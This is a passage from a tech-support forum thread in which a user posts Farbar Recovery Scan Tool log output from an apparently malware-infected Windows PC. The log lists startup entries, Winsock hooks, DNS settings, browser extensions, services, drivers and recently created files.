    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-10] (Realtek Semiconductor)
    HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212048 2012-06-07] (Realtek Semiconductor)
    HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
    HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
    HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-08-10] ()
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
    HKLM\...\Run: [Sound+] => "C:\Program Files\Sound+\Sound+.exe"
    HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508256 2012-04-23] (Dolby Laboratories Inc.)
    HKLM-x32\...\Run: [LManager] => [X]
    HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
    HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
    HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
    HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
    HKLM-x32\...\Run: [oasi_en_323010107] => [X]
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [uTorrent] => C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-02] (BitTorrent Inc.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify Web Helper] => C:\Users\owner\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-21] (Spotify Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50378880 2015-12-17] (Skype Technologies S.A.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify] => C:\Users\owner\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-21] (Spotify Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Birds] => C:\Users\owner\AppData\Local\Birds\birds365.exe [113664 2016-01-09] (Birds)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
    AppInit_DLLs: C:\ProgramData\Medlight\Icenix.dll => No File
    AppInit_DLLs-x32: C:\ProgramData\Medlight\Topstrong.dll => No File
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-01-10]
    ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
    GroupPolicy: Restriction - Chrome <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 16 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 75.153.176.1
    Tcpip\..\Interfaces\{1CF1C519-43BC-43DC-A100-5452BECE63BD}: [DhcpNameServer] 192.168.1.254 75.153.176.1
    Tcpip\..\Interfaces\{22E2DD4D-5728-4E97-8740-AA750D016189}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{3D911366-3BDF-44E8-8347-B89013568C76}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{559265AC-3060-4BF7-B113-B1CA25913253}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{6504a844-a2c7-11e4-824e-806e6f6e6963}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [DhcpNameServer] 192.168.42.129

    Internet Explorer:
    ==================
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
    SearchScopes: HKLM -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
    SearchScopes: HKU\S-1-5-21-3773202632-424774445-890114178-1001 -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
    BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
    BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10] (Qualcomm Atheros Commnucations)
    BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-31] (Oracle Corporation)
    BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-31] (Oracle Corporation)
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
    Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
    StartMenuInternet: IEXPLORE.EXE - iexplore.exe

    FireFox:
    ========
    FF ProfilePath: C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default
    FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
    FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/.com/?site=shyosffdefault&prd=set_ff&s=G1Azbwybl01,2e5a8f18-7777-4848-9eed-2132ef3331e1,
    FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-28] ()
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-28] ()
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
    FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-31] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-31] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
    FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-11-14] ()
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-09-30] (Adobe Systems Inc.)
    FF user.js: detected! => C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\user.js [2016-01-09]
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-03]
    FF Extension: McAfee WebAdvisor - C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\extensions\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}.xpi [2015-08-04] [not signed]
    FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
    FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
    FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    StartMenuInternet: FIREFOX.EXE - firefox.exe
     
  24. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Chrome:
    =======
    CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-09]
    CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-09]
    CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-09]
    CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-09]
    CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-09]
    CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1
    CHR Extension: (Google Slides) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-25]
    CHR Extension: (Google Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-25]
    CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25]
    CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25]
    CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-25]
    CHR Extension: (Google Sheets) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-25]
    CHR Extension: (SiteAdvisor) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-25]
    CHR Extension: (Google Docs Offline) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-25]
    CHR Extension: (Taplika New Tab) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lfkjojacgdjkninepeghaamnapdjmlfn [2015-11-25]
    CHR Extension: (Skype Click to Call) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-11-25]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-25]
    CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-25]
    CHR HKLM\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
    CHR HKLM-x32\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S2 AmazingTab; C:\Program Files\amztab\amztab.exe [383488 2016-01-09] () [File not signed]
    S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
    S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [538112 2016-01-09] () [File not signed]
    S2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [211584 2012-08-10] (Qualcomm Atheros Commnucations) [File not signed]
    S2 BrcmCardReader; C:\Program Files\Broadcom\MemoryCard\BrcmCardReader.exe [176640 2012-08-20] (Broadcom Corp.) [File not signed]
    S2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
    S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
    S2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
    S2 cmdidx; C:\Program Files\cmdidx\cmdidx.exe [383488 2016-01-09] () [File not signed]
    S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
    S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
    S2 extradoynldownkzhd; C:\Users\owner\AppData\Local\Donelectronics.exe [28160 2016-01-09] () [File not signed]
    S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
    S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
    S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
    S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
    S2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation)
    S2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-10-09] (Dritek System INC.)
    S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [836176 2015-12-14] (Valve Corporation) [File not signed]
    S2 Task Server; C:\Program Files\Task Server\TaskServer.exe [796160 2016-01-09] (Copyright © Microsoft 2015) [File not signed]
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
    S2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-07-31] (Atheros) [File not signed]
    S2 Gejdiubx; "C:\Users\owner\AppData\Roaming\RujgAjueocf\Remdhuus.exe" -cms [X]

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-08-10] (Qualcomm Atheros)
    S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
    S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
    R0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
    S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
    S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-10] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
    S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
    R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-10-09] (Dritek System Inc.)
    S3 usbrndis6; C:\Windows\system32\DRIVERS\usb80236.sys [20992 2013-08-22] (Microsoft Corporation)
    S3 voxaldriver; C:\Windows\system32\DRIVERS\voxaldriverx64.sys [34512 2015-10-26] ()
    S3 vpnva; C:\Windows\system32\DRIVERS\vpnva64-6.sys [52592 2014-10-16] (Cisco Systems, Inc.)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44024 2015-02-03] (Microsoft Corporation)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [264000 2015-02-03] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
    S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
    S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-10 18:13 - 2016-01-10 19:21 - 00000000 ____D C:\FRST
    2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Task Service
    2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Scan Service
    2016-01-10 15:07 - 2016-01-10 15:09 - 00140288 _____ (Microsoft) C:\WINDOWS\system32\MalwareScanner.exe
    2016-01-10 15:07 - 2016-01-10 15:09 - 00071168 _____ (Microsoft) C:\WINDOWS\system32\WindowsLock.exe
    2016-01-10 14:30 - 2016-01-10 15:21 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2016-01-10 14:30 - 2016-01-10 14:56 - 00001112 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Malwarebytes
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
    2016-01-10 14:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2016-01-10 14:30 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
    2016-01-10 14:30 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2016-01-09 21:13 - 2016-01-10 16:13 - 00000000 ____D C:\Users\owner\AppData\Local\CrashDumps
    2016-01-09 21:08 - 2016-01-10 14:56 - 00001422 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2016-01-09 21:00 - 2016-01-09 21:00 - 00019912 ____H C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
    2016-01-09 21:00 - 2016-01-09 21:00 - 00000000 ____D C:\ProgramData\fc7235fa-41a3-1
    2016-01-09 20:58 - 2016-01-09 20:58 - 00019720 ____H C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job
    2016-01-09 20:58 - 2016-01-09 20:58 - 00000000 ____D C:\ProgramData\ad8a10da-14d7-1
    2016-01-09 20:57 - 2016-01-09 20:57 - 00000000 ____D C:\Program Files (x86)\ExploreTech
    2016-01-09 20:11 - 2016-01-09 20:11 - 00000000 ____D C:\Program Files (x86)\predm
    2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\Users\owner\AppData\Local\NPE
    2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\ProgramData\Norton
    2016-01-09 19:33 - 2016-01-10 19:30 - 00726406 _____ C:\WINDOWS\ntbtlog.txt
    2016-01-09 19:24 - 2016-01-09 19:24 - 00003284 _____ C:\WINDOWS\System32\Tasks\psv_Temptough
    2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (5).exe
    2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (4).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (3).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (2).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 00002782 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
    2016-01-09 18:42 - 2016-01-10 14:56 - 00000876 _____ C:\Users\Public\Desktop\CCleaner.lnk
    2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\Program Files\CCleaner
    2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513.exe
    2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (1).exe
    2016-01-09 18:16 - 2016-01-09 18:16 - 00003242 _____ C:\WINDOWS\System32\Tasks\IBUpd2
    2016-01-09 18:15 - 2016-01-09 18:15 - 00022184 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
    2016-01-09 18:15 - 2016-01-09 18:15 - 00003406 _____ C:\WINDOWS\System32\Tasks\RSPro
    2016-01-09 18:14 - 2016-01-09 18:14 - 00000008 _____ C:\END
    2016-01-09 18:09 - 2016-01-10 16:09 - 00000282 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
    2016-01-09 18:09 - 2016-01-09 19:14 - 00000282 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
